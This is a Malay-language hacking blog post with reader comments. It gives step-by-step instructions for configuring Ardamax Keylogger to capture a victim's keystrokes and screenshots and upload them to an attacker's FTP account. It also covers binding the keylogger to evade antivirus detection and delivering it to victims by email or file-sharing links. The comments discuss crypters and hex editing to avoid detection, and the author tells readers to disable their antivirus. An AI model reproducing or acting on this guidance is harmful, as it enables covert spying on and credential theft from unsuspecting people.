Ok semua The Hykerz dan para pembaca..Mr.Hac nak sambung tutorial mengenai kaedah penggunaan Ardamax Keylogger yang Mr.Hac dah bagi korang muat turun sebelum ni di sini —> Muat Turun Ardamax Keylogger

Apa yang diperlukan?

1. Ardamax Keylogger

2. Akaun Ftp – korang boleh buat secara percuma di sini —> Drivehq

3. Binder. korang boleh muat turun di sini —> Perisian Binder Untuk Mematikan Pendeteksian Antivirus Terhadap Keylogger

Kaedah menghantar keylogger kepada mangsa:

1. Selepas pemasangan (installation) Ardamax Keylogger, klik kanan pada ikon dan pilih ‘Enter registration key’. masukkan maklumat yang diperlukan (ada disertakan dalam fail yang Hac bagi korang muat turun)

2. Kemudian klik pada ikon dan pilih remote installation, dan klik next dua kali. tandakan kesemua kotak seperti yang ditunjukkan dan klik next.

3. Klik enable dan masukkan kata laluan supaya tiada sesiapa yang dapat membuka keylogger. klik next sebanyak 3 kali dan tandakan send logs every, setkan masa sebagai contoh 5 minit, pilih Ftp sebagai ‘delivery method’, klik next.

4. Masukkan kesemua maklumat akaun Ftp yang telah dibuat sebentar tadi, klik next.
sebagai contoh Ftp host – ftp.drivehq.com , Remote folder -/logs ,Username – test

5. Ok..sekarang tandakan kesemua kotak, klik next. Setkan masa untuk ‘capture screenshot’. klik next, dan tukarkan ikon kepada ikon yang korang mahu, klik next, dan klik Finish.

6. SEKARANG, sila ikuti tutorial untuk menjadikan keylogger ini bebas dari pengesanan virus di sini —> Perisian Binder Untuk Mematikan Pendeteksian Antivirus Terhadap Keylogger. sekarang, keylogger ini sudah kebal dari ancaman antivirus.

7. Setelah itu, hantarkan keylogger tadi kepada mangsa, sama ada melalui e-mel, ataupun muat naik ke dalam mana-mana web penyimpanan fail seperti mediafire dan minta mangsa untuk memuat turunnya. sebaik sahaja ia dijalankan, setiap keystroke yang telah ditaip oleh mangsa akan dihantarkan ke akaun Ftp korang. boleh juga pilih untuk dihantarkan ke e-mel. tapi buat lah seperti yang Mr.Hac ajarkan ni. lebih mudah..heheheh..

Ok..sila komen! 3 entry HACKING dalam sehari tu!

Komen Facebook

Comments

  1. salam bro.
    aku merupakan silent reader blog ko ni. ni br first time komen. salam perkenalan:p

    nk tanye ckit la..

    ko da try ke??
    file ni clean ke??
    x de 'keylogger' ke dlm Ardamax Keylogger n sume file yg ko bg ni??

    risau gak aku nk install..huhu….

  2. huk aloh..bro..

    salam perkenalan..maaf lambat balas sebab aku sibuk dengan kursus..

    fail yang aku bagi kat ko 100% fully cleaned from keyloggers..ak takde la jahat sangat nak hack akaun pembaca blog aku..

    aku sayang beb readers blog aku ni terutamanya yang silent readers..

    jangan risau..install je..tak paham tanya ek..

  3. thanks bro..nnt aku try dlu.

    aku bukannya apa..untuk keselamatan..hehe….

    Istealer ade x..?:)(lebih2 lak aku ni..)

  4. Istealer?
    masuk ni dah 2 orang mintak ni..
    hmm..
    best sangat ke?
    nanti aku try kaji dulu ek..
    pastu kalau aku rase ok, aku masukkan dalam blog..
    jangan risau la bro..heheh..

  5. bro..aku try TEST tp x bleh la..

    FTP Host n Remote folder tu aku ikot mcm ko bg contoh tu tp username n password aku gune aku punya la.. dia kuar…
    "Can't connect to FTP host. The connection with the server was reset."

  6. @ lan antivirus ko block..hehehe!
    disable dulu antivirus ko..

    @ xdeath nanti aku post pasal tu..sibuk giler ni bro..
    esok kena g terengganu plak..next week sabah..arghh!!

    @ EpeaceTux salam perkenalan bro..thanks for visiting!

  7. bro…nak tanya,kalo aku dah bind key logger ni,n then aku encrypt lak…apa jd?makin undetectable ke?

  8. knape ade windows "unable to create installation package. try to disable ur antivirus. the system cannot find the path specified". ape mksd dia?

  9. salam arya…
    ak da try method nih…
    jd sme step..
    tp tang bind 2 x jdik la..
    ble bind jek still kene detect ngan antivirus..
    zero crypter pon ak try kene detect gak ngan av ak..
    hex editor pon da smpai ke row 2 pon still av ak bole detect…
    cane ak nk make sure av pc len x detect…?
    tlng taw….
    ak newbie jek…
    =)

  10. try la sampai dapat! korg ni manja sgt nk senangggg je terus! wat geram aku je baca komen korg ni! da terang² mr.hac kata,try-error-try-error tu pekara besa, try ;a ;g pai dpt! kn ada warning dia tulis, cuba lafix apa yg dia error tu! adoiiiiyai!! nak senang,nak kena suap je! luku pala baru tau!

  11. cam mana nk buat guna email, mksd nya dia hanta sume kt dlm email kita. saya buat guna step ni tp dia xanta pon?

Comments are closed.